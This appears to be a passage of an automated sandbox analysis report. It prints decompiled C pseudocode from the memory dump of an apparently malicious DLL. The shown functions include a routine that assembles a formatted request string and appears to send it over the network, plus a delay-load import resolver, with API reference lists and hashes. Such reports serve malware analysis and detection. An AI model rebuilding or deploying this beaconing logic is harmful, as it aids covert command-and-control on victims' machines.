                                                                                                                                                                                                                                    				_t134 = __imp__;
                                                                                                                                                                                                                                    				_v8 = _t72;
                                                                                                                                                                                                                                    				if(_t72 != 0) {
                                                                                                                                                                                                                                    					_t127 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t7 = _t127 + 0x2f9e8eb; // 0x736e6426
                                                                                                                                                                                                                                    					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
                                                                                                                                                                                                                                    					_t161 = _t161 + 0xc;
                                                                                                                                                                                                                                    					_t146 = _t146 + _t131;
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _v8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t73 = E02F97649();
                                                                                                                                                                                                                                    				_v8 = _t73;
                                                                                                                                                                                                                                    				if(_t73 != 0) {
                                                                                                                                                                                                                                    					_t122 =  *0x2f9d27c; // 0x44a5a8
                                                                                                                                                                                                                                    					_t11 = _t122 + 0x2f9e8f3; // 0x6f687726
                                                                                                                                                                                                                                    					wsprintfA(_t146 + _a16, _t11, _t73);
                                                                                                                                                                                                                                    					_t161 = _t161 + 0xc;
                                                                                                                                                                                                                                    					HeapFree( *0x2f9d238, 0, _v8);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t147 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    				_t75 = E02F99395(0x2f9d00a, _t147 + 4);
                                                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                                                    				_v20 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					L26:
                                                                                                                                                                                                                                    					RtlFreeHeap( *0x2f9d238, _t153, _a16); // executed
                                                                                                                                                                                                                                    					return _v12;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t78 = RtlAllocateHeap( *0x2f9d238, 0, 0x800);
                                                                                                                                                                                                                                    					_v8 = _t78;
                                                                                                                                                                                                                                    					if(_t78 == 0) {
                                                                                                                                                                                                                                    						L25:
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, _t153, _v20);
                                                                                                                                                                                                                                    						goto L26;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					E02F97A80(GetTickCount());
                                                                                                                                                                                                                                    					_t82 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    					__imp__(_t82 + 0x40);
                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    					_t86 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    					__imp__(_t86 + 0x40);
                                                                                                                                                                                                                                    					_t88 =  *0x2f9d32c; // 0x33e95b0
                                                                                                                                                                                                                                    					_t149 = E02F98307(1, _t144, _a16,  *_t88);
                                                                                                                                                                                                                                    					_v28 = _t149;
                                                                                                                                                                                                                                    					asm("lock xadd [eax], ecx");
                                                                                                                                                                                                                                    					if(_t149 == 0) {
                                                                                                                                                                                                                                    						L24:
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, _t153, _v8);
                                                                                                                                                                                                                                    						goto L25;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					StrTrimA(_t149, 0x2f9c2ac);
                                                                                                                                                                                                                                    					_push(_t149);
                                                                                                                                                                                                                                    					_t94 = E02F93CC8();
                                                                                                                                                                                                                                    					_v16 = _t94;
                                                                                                                                                                                                                                    					if(_t94 == 0) {
                                                                                                                                                                                                                                    						L23:
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, _t153, _t149);
                                                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t154 = __imp__;
                                                                                                                                                                                                                                    					 *_t154(_t149, _a4);
                                                                                                                                                                                                                                    					 *_t154(_v8, _v20);
                                                                                                                                                                                                                                    					_t155 = __imp__;
                                                                                                                                                                                                                                    					 *_t155(_v8, _v16);
                                                                                                                                                                                                                                    					 *_t155(_v8, _t149);
                                                                                                                                                                                                                                    					_t101 = E02F9809F(0, _v8);
                                                                                                                                                                                                                                    					_a4 = _t101;
                                                                                                                                                                                                                                    					if(_t101 == 0) {
                                                                                                                                                                                                                                    						_v12 = 8;
                                                                                                                                                                                                                                    						L21:
                                                                                                                                                                                                                                    						E02F9A1B0();
                                                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                                                    						HeapFree( *0x2f9d238, 0, _v16);
                                                                                                                                                                                                                                    						_t153 = 0;
                                                                                                                                                                                                                                    						goto L23;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t105 = E02F943DF(_t134, 0xffffffffffffffff, _t149,  &_v24); // executed
                                                                                                                                                                                                                                    					_v12 = _t105;
                                                                                                                                                                                                                                    					if(_t105 == 0) {
                                                                                                                                                                                                                                    						_t158 = _v24;
                                                                                                                                                                                                                                    						_t112 = E02F9163F(_t158, _a4, _a8, _a12); // executed
                                                                                                                                                                                                                                    						_v12 = _t112;
                                                                                                                                                                                                                                    						_t113 =  *((intOrPtr*)(_t158 + 8));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
                                                                                                                                                                                                                                    						_t115 =  *((intOrPtr*)(_t158 + 8));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t115 + 8))(_t115);
                                                                                                                                                                                                                                    						_t117 =  *((intOrPtr*)(_t158 + 4));
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t117 + 8))(_t117);
                                                                                                                                                                                                                                    						_t119 =  *_t158;
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t119 + 8))(_t119);
                                                                                                                                                                                                                                    						E02F99039(_t158);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_v12 != 0x10d2) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						if(_v12 == 0) {
                                                                                                                                                                                                                                    							_t107 = _a8;
                                                                                                                                                                                                                                    							if(_t107 != 0) {
                                                                                                                                                                                                                                    								_t150 =  *_t107;
                                                                                                                                                                                                                                    								_t156 =  *_a12;
                                                                                                                                                                                                                                    								wcstombs( *_t107,  *_t107,  *_a12);
                                                                                                                                                                                                                                    								_t110 = E02F985DB(_t150, _t150, _t156 >> 1);
                                                                                                                                                                                                                                    								_t149 = _v28;
                                                                                                                                                                                                                                    								 *_a12 = _t110;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L19;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L19:
                                                                                                                                                                                                                                    							E02F99039(_a4);
                                                                                                                                                                                                                                    							if(_v12 == 0 || _v12 == 0x10d2) {
                                                                                                                                                                                                                                    								goto L22;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								goto L21;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = _v12 & 0x00000000;
                                                                                                                                                                                                                                    						goto L16;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}






















































                                                                                                                                                                                                                                    0x02f98c62
                                                                                                                                                                                                                                    0x02f98c67
                                                                                                                                                                                                                                    0x02f98c74
                                                                                                                                                                                                                                    0x02f98c76
                                                                                                                                                                                                                                    0x02f98c84
                                                                                                                                                                                                                                    0x02f98c84
                                                                                                                                                                                                                                    0x02f98c86
                                                                                                                                                                                                                                    0x02f98c94
                                                                                                                                                                                                                                    0x02f98c99
                                                                                                                                                                                                                                    0x02f98c9d
                                                                                                                                                                                                                                    0x02f98ca0
                                                                                                                                                                                                                                    0x02f98e63
                                                                                                                                                                                                                                    0x02f98e6d
                                                                                                                                                                                                                                    0x02f98e76
                                                                                                                                                                                                                                    0x02f98ca6
                                                                                                                                                                                                                                    0x02f98cb2
                                                                                                                                                                                                                                    0x02f98cba
                                                                                                                                                                                                                                    0x02f98cbd
                                                                                                                                                                                                                                    0x02f98e57
                                                                                                                                                                                                                                    0x02f98e61
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e61
                                                                                                                                                                                                                                    0x02f98cc9
                                                                                                                                                                                                                                    0x02f98cce
                                                                                                                                                                                                                                    0x02f98cd7
                                                                                                                                                                                                                                    0x02f98ce8
                                                                                                                                                                                                                                    0x02f98cec
                                                                                                                                                                                                                                    0x02f98cf5
                                                                                                                                                                                                                                    0x02f98cfb
                                                                                                                                                                                                                                    0x02f98d0a
                                                                                                                                                                                                                                    0x02f98d11
                                                                                                                                                                                                                                    0x02f98d1a
                                                                                                                                                                                                                                    0x02f98d20
                                                                                                                                                                                                                                    0x02f98e4b
                                                                                                                                                                                                                                    0x02f98e55
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e55
                                                                                                                                                                                                                                    0x02f98d2c
                                                                                                                                                                                                                                    0x02f98d32
                                                                                                                                                                                                                                    0x02f98d33
                                                                                                                                                                                                                                    0x02f98d3a
                                                                                                                                                                                                                                    0x02f98d3d
                                                                                                                                                                                                                                    0x02f98e41
                                                                                                                                                                                                                                    0x02f98e49
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e49
                                                                                                                                                                                                                                    0x02f98d46
                                                                                                                                                                                                                                    0x02f98d4d
                                                                                                                                                                                                                                    0x02f98d55
                                                                                                                                                                                                                                    0x02f98d5a
                                                                                                                                                                                                                                    0x02f98d63
                                                                                                                                                                                                                                    0x02f98d69
                                                                                                                                                                                                                                    0x02f98d70
                                                                                                                                                                                                                                    0x02f98d77
                                                                                                                                                                                                                                    0x02f98d7a
                                                                                                                                                                                                                                    0x02f98e79
                                                                                                                                                                                                                                    0x02f98e2d
                                                                                                                                                                                                                                    0x02f98e2d
                                                                                                                                                                                                                                    0x02f98e32
                                                                                                                                                                                                                                    0x02f98e3d
                                                                                                                                                                                                                                    0x02f98e3f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e3f
                                                                                                                                                                                                                                    0x02f98d84
                                                                                                                                                                                                                                    0x02f98d8b
                                                                                                                                                                                                                                    0x02f98d8e
                                                                                                                                                                                                                                    0x02f98d93
                                                                                                                                                                                                                                    0x02f98d9e
                                                                                                                                                                                                                                    0x02f98da3
                                                                                                                                                                                                                                    0x02f98da6
                                                                                                                                                                                                                                    0x02f98dac
                                                                                                                                                                                                                                    0x02f98db2
                                                                                                                                                                                                                                    0x02f98db8
                                                                                                                                                                                                                                    0x02f98dbb
                                                                                                                                                                                                                                    0x02f98dc1
                                                                                                                                                                                                                                    0x02f98dc4
                                                                                                                                                                                                                                    0x02f98dc9
                                                                                                                                                                                                                                    0x02f98dcd
                                                                                                                                                                                                                                    0x02f98dcd
                                                                                                                                                                                                                                    0x02f98dd9
                                                                                                                                                                                                                                    0x02f98de5
                                                                                                                                                                                                                                    0x02f98de9
                                                                                                                                                                                                                                    0x02f98deb
                                                                                                                                                                                                                                    0x02f98df0
                                                                                                                                                                                                                                    0x02f98df2
                                                                                                                                                                                                                                    0x02f98df7
                                                                                                                                                                                                                                    0x02f98dfc
                                                                                                                                                                                                                                    0x02f98e09
                                                                                                                                                                                                                                    0x02f98e11
                                                                                                                                                                                                                                    0x02f98e14
                                                                                                                                                                                                                                    0x02f98e14
                                                                                                                                                                                                                                    0x02f98df0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98ddb
                                                                                                                                                                                                                                    0x02f98ddf
                                                                                                                                                                                                                                    0x02f98e16
                                                                                                                                                                                                                                    0x02f98e19
                                                                                                                                                                                                                                    0x02f98e22
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98e22
                                                                                                                                                                                                                                    0x02f98de1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98de1
                                                                                                                                                                                                                                    0x02f98dd9

APIs
• GetTickCount.KERNEL32 ref: 02F98BA8
• wsprintfA.USER32 ref: 02F98BF8
• wsprintfA.USER32 ref: 02F98C15
• wsprintfA.USER32 ref: 02F98C41
• HeapFree.KERNEL32(00000000,?), ref: 02F98C53
• wsprintfA.USER32 ref: 02F98C74
• HeapFree.KERNEL32(00000000,?), ref: 02F98C84
• RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02F98CB2
• GetTickCount.KERNEL32 ref: 02F98CC3
• RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F98CD7
• RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F98CF5
  • Part of subcall function 02F98307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,73FCC740,?,?,02F9A428,?,033E95B0), ref: 02F98332
  • Part of subcall function 02F98307: lstrlen.KERNEL32(?,?,?,02F9A428,?,033E95B0), ref: 02F9833A
  • Part of subcall function 02F98307: strcpy.NTDLL ref: 02F98351
  • Part of subcall function 02F98307: lstrcat.KERNEL32(00000000,?), ref: 02F9835C
  • Part of subcall function 02F98307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02F9A428,?,033E95B0), ref: 02F98379
• StrTrimA.SHLWAPI(00000000,02F9C2AC,?,033E95B0), ref: 02F98D2C
  • Part of subcall function 02F93CC8: lstrlen.KERNEL32(033E87FA,00000000,00000000,73FCC740,02F9A453,00000000), ref: 02F93CD8
  • Part of subcall function 02F93CC8: lstrlen.KERNEL32(?), ref: 02F93CE0
  • Part of subcall function 02F93CC8: lstrcpy.KERNEL32(00000000,033E87FA), ref: 02F93CF4
  • Part of subcall function 02F93CC8: lstrcat.KERNEL32(00000000,?), ref: 02F93CFF
• lstrcpy.KERNEL32(00000000,?), ref: 02F98D4D
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 02F98D55
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 02F98D63
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 02F98D69
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: lstrlen.KERNEL32(?,00000000,02F9D330,00000001,02F92200,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9), ref: 02F980A8
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: mbstowcs.NTDLL ref: 02F980CF
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: memset.NTDLL ref: 02F980E1
                                                                                                                                                                                                                                    • wcstombs.NTDLL ref: 02F98DFC
                                                                                                                                                                                                                                      • Part of subcall function 02F9163F: SysAllocString.OLEAUT32(?), ref: 02F91680
                                                                                                                                                                                                                                      • Part of subcall function 02F9163F: IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 02F91702
                                                                                                                                                                                                                                      • Part of subcall function 02F9163F: StrStrIW.SHLWAPI(?,006E0069), ref: 02F91741
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?), ref: 02F98E3D
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02F98E49
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,033E95B0), ref: 02F98E55
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 02F98E61
                                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000,?), ref: 02F98E6D
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterInterface_LeaveProxyQueryStringUnknown_mbstowcsmemsetstrcpywcstombs
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 603507560-0
                                                                                                                                                                                                                                    • Opcode ID: 85333cb2fb22596e86b84c32f677edcccfcfb204bae597f19db6f64beb815d71
                                                                                                                                                                                                                                    • Instruction ID: dd3653c3a4d37d344af2df03991edc31e0b35d8ebbd63c2e0e6d844a7e681f06
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85333cb2fb22596e86b84c32f677edcccfcfb204bae597f19db6f64beb815d71
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5912771D40208AFEF11EFA4DC88A9ABBB9EF097D0F244855E609D7260D7319961DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    [Control-flow graph of the function at 02F9ADE5; graph image not reproduced]
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			E02F9ADE5(long _a4, long _a8) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                                    				LONG* _v28;
                                                                                                                                                                                                                                    				long _v40;
                                                                                                                                                                                                                                    				long _v44;
                                                                                                                                                                                                                                    				long _v48;
                                                                                                                                                                                                                                    				CHAR* _v52;
                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                    				CHAR* _v60;
                                                                                                                                                                                                                                    				long _v64;
                                                                                                                                                                                                                                    				signed int* _v68;
                                                                                                                                                                                                                                    				char _v72;
                                                                                                                                                                                                                                    				signed int _t76;
                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                                                    				intOrPtr* _t82;
                                                                                                                                                                                                                                    				intOrPtr* _t83;
                                                                                                                                                                                                                                    				intOrPtr* _t85;
                                                                                                                                                                                                                                    				intOrPtr* _t90;
                                                                                                                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                                                                                                                    				intOrPtr* _t98;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t99;
                                                                                                                                                                                                                                    				void* _t102;
                                                                                                                                                                                                                                    				intOrPtr* _t104;
                                                                                                                                                                                                                                    				void* _t115;
                                                                                                                                                                                                                                    				long _t116;
                                                                                                                                                                                                                                    				void _t125;
                                                                                                                                                                                                                                    				void* _t131;
                                                                                                                                                                                                                                    				signed short _t133;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t138;
                                                                                                                                                                                                                                    				signed int* _t139;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t139 = _a4;
                                                                                                                                                                                                                                    				_v28 = _t139[2] + 0x2f90000;
                                                                                                                                                                                                                                    				_t115 = _t139[3] + 0x2f90000;
                                                                                                                                                                                                                                    				_t131 = _t139[4] + 0x2f90000;
                                                                                                                                                                                                                                    				_v8 = _t139[7];
                                                                                                                                                                                                                                    				_v60 = _t139[1] + 0x2f90000;
                                                                                                                                                                                                                                    				_v16 = _t139[5] + 0x2f90000;
                                                                                                                                                                                                                                    				_v64 = _a8;
                                                                                                                                                                                                                                    				_v72 = 0x24;
                                                                                                                                                                                                                                    				_v68 = _t139;
                                                                                                                                                                                                                                    				_v56 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_v48 = 0;
                                                                                                                                                                                                                                    				_v44 = 0;
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				if(( *_t139 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    					_a8 =  &_v72;
                                                                                                                                                                                                                                    					RaiseException(0xc06d0057, 0, 1,  &_a8);
                                                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t138 =  *_v28;
                                                                                                                                                                                                                                    				_t76 = _a8 - _t115 >> 2 << 2;
                                                                                                                                                                                                                                    				_t133 =  *(_t131 + _t76);
                                                                                                                                                                                                                                    				_a4 = _t76;
                                                                                                                                                                                                                                    				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
                                                                                                                                                                                                                                    				_v56 = _t80;
                                                                                                                                                                                                                                    				_t81 = _t133 + 0x2f90002;
                                                                                                                                                                                                                                    				if(_t80 == 0) {
                                                                                                                                                                                                                                    					_t81 = _t133 & 0x0000ffff;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_v52 = _t81;
                                                                                                                                                                                                                                    				_t82 =  *0x2f9d1a0; // 0x0
                                                                                                                                                                                                                                    				_t116 = 0;
                                                                                                                                                                                                                                    				if(_t82 == 0) {
                                                                                                                                                                                                                                    					L6:
                                                                                                                                                                                                                                    					if(_t138 != 0) {
                                                                                                                                                                                                                                    						L18:
                                                                                                                                                                                                                                    						_t83 =  *0x2f9d1a0; // 0x0
                                                                                                                                                                                                                                    						_v48 = _t138;
                                                                                                                                                                                                                                    						if(_t83 != 0) {
                                                                                                                                                                                                                                    							_t116 =  *_t83(2,  &_v72);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t116 != 0) {
                                                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                                                    							 *_a8 = _t116;
                                                                                                                                                                                                                                    							L33:
                                                                                                                                                                                                                                    							_t85 =  *0x2f9d1a0; // 0x0
                                                                                                                                                                                                                                    							if(_t85 != 0) {
                                                                                                                                                                                                                                    								_v40 = _v40 & 0x00000000;
                                                                                                                                                                                                                                    								_v48 = _t138;
                                                                                                                                                                                                                                    								_v44 = _t116;
                                                                                                                                                                                                                                    								 *_t85(5,  &_v72);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							return _t116;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							if(_t139[5] == _t116 || _t139[7] == _t116) {
                                                                                                                                                                                                                                    								L27:
                                                                                                                                                                                                                                    								_t116 = GetProcAddress(_t138, _v52);
                                                                                                                                                                                                                                    								if(_t116 == 0) {
                                                                                                                                                                                                                                    									_v40 = GetLastError();
                                                                                                                                                                                                                                    									_t90 =  *0x2f9d19c; // 0x0
                                                                                                                                                                                                                                    									if(_t90 != 0) {
                                                                                                                                                                                                                                    										_t116 =  *_t90(4,  &_v72);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if(_t116 == 0) {
                                                                                                                                                                                                                                    										_a4 =  &_v72;
                                                                                                                                                                                                                                    										RaiseException(0xc06d007f, _t116, 1,  &_a4);
                                                                                                                                                                                                                                    										_t116 = _v44;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
                                                                                                                                                                                                                                    								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
                                                                                                                                                                                                                                    									_t116 =  *(_a4 + _v16);
                                                                                                                                                                                                                                    									if(_t116 != 0) {
                                                                                                                                                                                                                                    										goto L32;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								goto L27;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t98 =  *0x2f9d1a0; // 0x0
                                                                                                                                                                                                                                    					if(_t98 == 0) {
                                                                                                                                                                                                                                    						L9:
                                                                                                                                                                                                                                    						_t99 = LoadLibraryA(_v60); // executed
                                                                                                                                                                                                                                    						_t138 = _t99;
                                                                                                                                                                                                                                    						if(_t138 != 0) {
                                                                                                                                                                                                                                    							L13:
                                                                                                                                                                                                                                    							if(InterlockedExchange(_v28, _t138) == _t138) {
                                                                                                                                                                                                                                    								FreeLibrary(_t138);
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								if(_t139[6] != 0) {
                                                                                                                                                                                                                                    									_t102 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                                                    									if(_t102 != 0) {
                                                                                                                                                                                                                                    										 *(_t102 + 4) = _t139;
                                                                                                                                                                                                                                    										_t125 =  *0x2f9d198; // 0x0
                                                                                                                                                                                                                                    										 *_t102 = _t125;
                                                                                                                                                                                                                                    										 *0x2f9d198 = _t102;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							goto L18;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v40 = GetLastError();
                                                                                                                                                                                                                                    						_t104 =  *0x2f9d19c; // 0x0
                                                                                                                                                                                                                                    						if(_t104 == 0) {
                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                    							_a8 =  &_v72;
                                                                                                                                                                                                                                    							RaiseException(0xc06d007e, 0, 1,  &_a8);
                                                                                                                                                                                                                                    							return _v44;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t138 =  *_t104(3,  &_v72);
                                                                                                                                                                                                                                    						if(_t138 != 0) {
                                                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t138 =  *_t98(1,  &_v72);
                                                                                                                                                                                                                                    					if(_t138 != 0) {
                                                                                                                                                                                                                                    						goto L13;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L9;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t116 =  *_t82(0,  &_v72);
                                                                                                                                                                                                                                    				if(_t116 != 0) {
                                                                                                                                                                                                                                    					goto L33;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				goto L6;
                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                    0x02f9aff9
                                                                                                                                                                                                                                    0x02f9affc
                                                                                                                                                                                                                                    0x02f9affe
                                                                                                                                                                                                                                    0x02f9affe
                                                                                                                                                                                                                                    0x02f9b005
                                                                                                                                                                                                                                    0x02f9b007
                                                                                                                                                                                                                                    0x02f9b011
                                                                                                                                                                                                                                    0x02f9b014
                                                                                                                                                                                                                                    0x02f9b017
                                                                                                                                                                                                                                    0x02f9b017
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af7d
                                                                                                                                                                                                                                    0x02f9af80
                                                                                                                                                                                                                                    0x02f9afae
                                                                                                                                                                                                                                    0x02f9afb8
                                                                                                                                                                                                                                    0x02f9afbc
                                                                                                                                                                                                                                    0x02f9afc4
                                                                                                                                                                                                                                    0x02f9afc7
                                                                                                                                                                                                                                    0x02f9afce
                                                                                                                                                                                                                                    0x02f9afd8
                                                                                                                                                                                                                                    0x02f9afd8
                                                                                                                                                                                                                                    0x02f9afdc
                                                                                                                                                                                                                                    0x02f9afe1
                                                                                                                                                                                                                                    0x02f9aff0
                                                                                                                                                                                                                                    0x02f9aff6
                                                                                                                                                                                                                                    0x02f9aff6
                                                                                                                                                                                                                                    0x02f9afdc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af87
                                                                                                                                                                                                                                    0x02f9af8a
                                                                                                                                                                                                                                    0x02f9af92
                                                                                                                                                                                                                                    0x02f9afa7
                                                                                                                                                                                                                                    0x02f9afac
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9afac
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af92
                                                                                                                                                                                                                                    0x02f9af80
                                                                                                                                                                                                                                    0x02f9af7b
                                                                                                                                                                                                                                    0x02f9aec1
                                                                                                                                                                                                                                    0x02f9aec8
                                                                                                                                                                                                                                    0x02f9aed8
                                                                                                                                                                                                                                    0x02f9aedb
                                                                                                                                                                                                                                    0x02f9aee1
                                                                                                                                                                                                                                    0x02f9aee5
                                                                                                                                                                                                                                    0x02f9af28
                                                                                                                                                                                                                                    0x02f9af34
                                                                                                                                                                                                                                    0x02f9af5d
                                                                                                                                                                                                                                    0x02f9af36
                                                                                                                                                                                                                                    0x02f9af3a
                                                                                                                                                                                                                                    0x02f9af40
                                                                                                                                                                                                                                    0x02f9af48
                                                                                                                                                                                                                                    0x02f9af4a
                                                                                                                                                                                                                                    0x02f9af4d
                                                                                                                                                                                                                                    0x02f9af53
                                                                                                                                                                                                                                    0x02f9af55
                                                                                                                                                                                                                                    0x02f9af55
                                                                                                                                                                                                                                    0x02f9af48
                                                                                                                                                                                                                                    0x02f9af3a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9af34
                                                                                                                                                                                                                                    0x02f9aeed
                                                                                                                                                                                                                                    0x02f9aef0
                                                                                                                                                                                                                                    0x02f9aef7
                                                                                                                                                                                                                                    0x02f9af07
